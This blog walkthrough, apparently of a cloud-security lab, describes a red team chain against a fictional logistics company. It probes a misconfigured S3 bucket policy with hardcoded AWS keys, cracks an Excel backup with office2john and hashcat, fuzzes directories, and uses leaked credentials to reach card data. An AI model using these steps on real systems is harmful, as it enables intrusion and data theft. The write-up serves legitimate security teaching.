Exploit Weak Bucket Policies for Privileged Access
This article describes a red team engagement against Huge Logistics. Starting from a public IP address and AWS credentials discovered in a shipping application, the attacker scans and probes a Node.js application and an S3 bucket. After downloading and cracking a backup file, login credentials for WebCRM and other systems are recovered. Further enumeration of the website reveals a hidden CRM page, ultimately giving access to sensitive customer data and credit card information.

Reju Kole


Picture By Sora | AWS

Scenario

During an approved red team test for Huge Logistics, our team found a public IP address, 13.43.144.61, and AWS credentials hardcoded in a shipping application. The goal of this engagement is to use this information to explore the company's cloud environment further and demonstrate the potential impact by reaching sensitive data.

Enumeration

Let's begin with an Nmap scan (-Pn skips host discovery, -sC runs the default scripts, and -sV probes service versions).

nmap -Pn -sC -sV -A --top-ports=1000 13.43.144.61

The scan shows a Node.js application running on its default port and indicates that the app is hosted on an EC2 instance in the eu-west-2 region.


Nmap Scan

The Nmap scan shows that the target system is online and reachable. Almost all ports are filtered, but port 3000 is open. This port is running a web application built with the Node.js Express framework. When accessing it, the page title shows “Huge Logistics > Home,” which confirms it is the main application.

The server appears to be running on a Linux system and is hosted on an AWS EC2 instance in the eu-west-2 region. The operating system version could not be identified with full confidence, but it looks like a Linux 4.x based system. Overall, this tells us there is a single exposed web service on port 3000 that is likely the main entry point for further testing.

Opening the IP address in a web browser loads the Huge Logistics homepage.

http://13.43.144.61:3000/


Huge Logistics

The site includes a login page, but trying common usernames and passwords does not work, and no other features stand out as easy to exploit. At this point, the next step is to review the website's source code for anything useful.

http://13.43.144.61:3000/login?


Login Page

Viewing the homepage source reveals the following snippet:

<header class="main-header">
<section class="container main-hero-container">
<div class="row">
<div class="col-12 col-lg-6">
<h1 class="Heading display-5 align-items-center">
Huge Logistics
</h1>
<img src="https://hugelogistics-data.s3.eu-west-2.amazonaws.com/truck.png" class="truckimg" alt="" srcset="">
<h2 class="sub-Heading">Everyday Anytime Anywhere</h2>
<p class="main-hero-para">
Your Ultimate Logistics Partner. With a focus on precision and efficiency,
we redefine supply chain management. Seamlessly connecting your shipments across distances,
our advanced solutions ensure your cargo's safe and timely arrival.
Our technology-driven approach empowers you with real-time tracking.


This shows that the site is loading static files from an S3 bucket called hugelogistics-data.
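A quick way to spot such references without reading the whole page is to grep the HTML for S3 URLs. This one-liner is a generic sketch of my own, not part of the original methodology:

curl -s http://13.43.144.61:3000/ | grep -oE 'https?://[a-zA-Z0-9.-]+\.s3[a-zA-Z0-9.-]*\.amazonaws\.com[^"]*'

It should print the hugelogistics-data object URLs embedded in the page, such as the truck.png image above.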

AWS Configure

Next, I set up the AWS credentials found in the application using aws configure.

aws configure
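The tool prompts for the key pair, a default region, and an output format; the values below are placeholders, with eu-west-2 chosen to match the region identified by the scan:

AWS Access Key ID [None]: AKIA****************
AWS Secret Access Key [None]: ****************************************
Default region name [None]: eu-west-2
Default output format [None]: json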


Configured Successfully
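Although not shown in the original run, a quick way to confirm that stolen keys are live is to ask STS who they belong to:

aws sts get-caller-identity

This returns the account ID and the ARN of the user or role the keys map to.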

I try to list the contents of the S3 bucket, but neither attempt succeeds. The first command checks whether my authenticated user has permission to list the bucket. The second checks whether the bucket allows public access: since I am using AWS CLI v2, all requests are signed by default, so I add the --no-sign-request option to send the request without credentials.

aws s3 ls hugelogistics-data
aws s3 ls hugelogistics-data --no-sign-request
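Both commands fail with an access error along the following lines (typical AWS CLI output, reproduced from memory rather than the original screenshot):

An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied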


I might try to download all the files from the bucket using aws s3 cp s3://hugelogistics-data . --recursive, but this also fails because the command first tries to list the bucket to see which files are available to download.

I move on and check for other permissions.

It is worth checking whether I can view the S3 bucket ACL, also known as the Access Control List. Bucket ACLs are an older and simpler permission system compared to bucket policies. They are used to grant read or write access to the bucket or the objects inside it to predefined Amazon S3 groups.

aws s3api get-bucket-acl --bucket hugelogistics-data

I do not have permission to read the bucket ACL. Instead, I check whether I can view the bucket policy. Bucket policies are attached directly to the bucket and specify which actions are allowed or denied for which users or roles.

aws s3api get-bucket-policy --bucket hugelogistics-data

Success! The command returns the full JSON policy, but as a single escaped line that is hard to read. To make it readable, I format it with jq:

aws s3api get-bucket-policy --bucket hugelogistics-data | jq -r '.Policy' | sed 's/\\//g' | jq


I retrieve the bucket policy for hugelogistics-data and see that it allows some interesting access. The policy shows two main statements:

  1. Public read access for specific objects: any AWS user ("AWS": "*") is allowed to read the objects backup.xlsx and background.png, and also to view their ACLs.
  2. Permission to get the bucket policy: any AWS user is allowed to view the bucket policy itself.

This means that even without full access, I can read specific files and see the bucket’s policy.
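Reconstructed from those two statements, the policy presumably looks roughly like this; the Sids, ordering, and exact formatting of the real policy may differ:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "AWS": "*" },
      "Action": [ "s3:GetObject", "s3:GetObjectAcl" ],
      "Resource": [
        "arn:aws:s3:::hugelogistics-data/backup.xlsx",
        "arn:aws:s3:::hugelogistics-data/background.png"
      ]
    },
    {
      "Effect": "Allow",
      "Principal": { "AWS": "*" },
      "Action": "s3:GetBucketPolicy",
      "Resource": "arn:aws:s3:::hugelogistics-data"
    }
  ]
}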

Even though I cannot list the bucket contents, I can still fetch these specific objects directly and leak their data. The next step is to download the Excel file to my local system.

aws s3 cp s3://hugelogistics-data/backup.xlsx .
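As a side note, because the Allow statement uses the wildcard principal, the object may even be retrievable anonymously over plain HTTPS. This is an untested assumption, not something exercised in the engagement:

curl -O https://hugelogistics-data.s3.eu-west-2.amazonaws.com/backup.xlsx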


When I try to open the file in LibreOffice or Microsoft Office, it asks for a password. The next step is to see if I can crack that password.

First, I download the Python script called office2john.py.

wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/office2john.py


This script takes a Microsoft Office file as input and converts it into a hash that matches the version of the Office document.

Different Office versions use different encryption methods, so tools like hashcat need the correct mode to crack them. Office 2007 uses SHA 1 with AES 128. Office 2010 moved to SHA 512 with AES 128 or AES 256. Office 2013 and newer versions improved security even more by using SHA 512 with AES 256 by default. They also add a random salt and increase the number of hashing rounds. Because of this, cracking passwords from newer Office files takes much more time and computing power.
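For reference, the relevant hash modes from hashcat's mode list are:

9400  MS Office 2007
9500  MS Office 2010
9600  MS Office 2013

Files produced by Office 2013 and later generally fall under mode 9600.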

I run the command below to generate a hash of the document so it can be used for an offline brute force attack.

python3 office2john.py backup.xlsx > backup_hash.txt


The generated hash is already in a format that John the Ripper can use, but it needs a small modification to work with hashcat. From the output, I can also see that the Excel file was automatically detected as an Office 2013 or newer version.
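The output has roughly the following shape (salt and verifier values elided here):

backup.xlsx:$office$*2013*100000*256*16*<salt>*<verifier>*<verifier hash>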


Remove the leading filename prefix (backup.xlsx:) from the hash and save the file; hashcat does not accept the John-style filename prefix (alternatively, hashcat's --username option can be used to ignore it).
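This can be done in any editor, or with a one-liner such as:

sed -i 's/^backup.xlsx://' backup_hash.txt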


wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt


I run the command below, where -a 0 selects a straight wordlist attack and -m 9600 selects the MS Office 2013 hash mode, and successfully crack the spreadsheet password in less than two minutes.

hashcat -a 0 -m 9600 backup_hash.txt rockyou.txt
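Once the session finishes, the recovered password can be re-displayed at any time from hashcat's potfile:

hashcat -m 9600 backup_hash.txt --show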


Cracked: summertime


backup.xlsx

Username            Password           System
[email protected]   5w8=U5taN]V7       WebCRM
[email protected]   {&6Um-aC5@9        HR portal
mflear              Michelle123!       Email
mflear              Password01!        Cisco VPN
admin               Admin1234          Redshift
michellef           HugeLogistics2023  ADP
michellef           DataEngineer123    Azure
[email protected]   MichelleFleur!     Slack
mflear              12345678ABC!       Harvest
michellef           Password01!        SharePoint
[email protected]   Welcome01!         JIRA
admin               admin              MongoDB Atlas

At this point, the website is the only attack surface available, so I continue enumerating it to see if there are any other files or directories hosted on it. For this, I use Gobuster. If it is not already installed, it can be installed using the following command.

apt install gobuster

Next, I grab a Dirbuster wordlist and use it to fuzz the server for hidden files or directories.

wget https://raw.githubusercontent.com/daviddias/node-dirbuster/master/lists/directory-list-lowercase-2.3-medium.txt


gobuster dir -u http://13.43.144.61:3000/ -w directory-list-lowercase-2.3-medium.txt

Running Gobuster reveals a directory called /crm that I have not seen before. I open it in the browser to see what it contains.


This leads to another login page. Remembering the WebCRM credentials found in the spreadsheet, I try them here, and the login works successfully.

http://13.43.144.61:3000/crm


Admin / CRM System
[email protected] 5w8=U5taN]V7 WebCRM


After logging in, I see a dashboard with options to manage shipments, users, and invoices.

http://13.43.144.61:3000/dashboard



When I click View Invoices Status, a page loads showing users’ credit card details. This clearly demonstrates sensitive data exposure and confirms full impact.

http://13.43.144.61:3000/invoices


Pwned!

By clicking on Export Data, I am able to download the full customer dataset.


full customer dataset

Attack Path Visualization

  1. Discovered a public IP address and hardcoded AWS credentials in the shipping application
  2. Scanned the IP and identified a Node.js web application running on port 3000
  3. Visited the website and reviewed the source code
  4. Found references to an S3 bucket named hugelogistics-data
  5. Configured AWS credentials and checked S3 permissions
  6. Retrieved the bucket policy and identified readable objects
  7. Downloaded a protected Excel backup file from the S3 bucket
  8. Cracked the Excel password using an offline attack
  9. Extracted valid WebCRM login credentials from the spreadsheet
  10. Enumerated the website and discovered the hidden /crm directory
  11. Logged into the CRM using leaked credentials
  12. Gained access to shipment, user, and invoice management
  13. Viewed exposed credit card information
  14. Used the export feature to download full customer data

Impact: Full compromise of sensitive customer and financial data.

I hope you enjoyed this writeup! Happy Hacking :)

Subscribe to me on Medium and be sure to turn on email notifications so you never miss out on my latest walkthroughs, write-ups, and other informative posts.

Follow me on social media:

  1. LinkedIn: Reju Kole
  2. Instagram: reju.kole.9
  3. TryHackMe: TryHackMe | W40X
  4. Twitter | X: @Mr_W40X
  5. GitHub: W40X | Reju Kole | Security Researcher

In case you need any help feel free to message me on my social media handles.


Source: https://infosecwriteups.com/exploit-weak-bucket-policies-for-privileged-access-54ccf5ecb5a9?source=rss----7b722bfd1b8d---4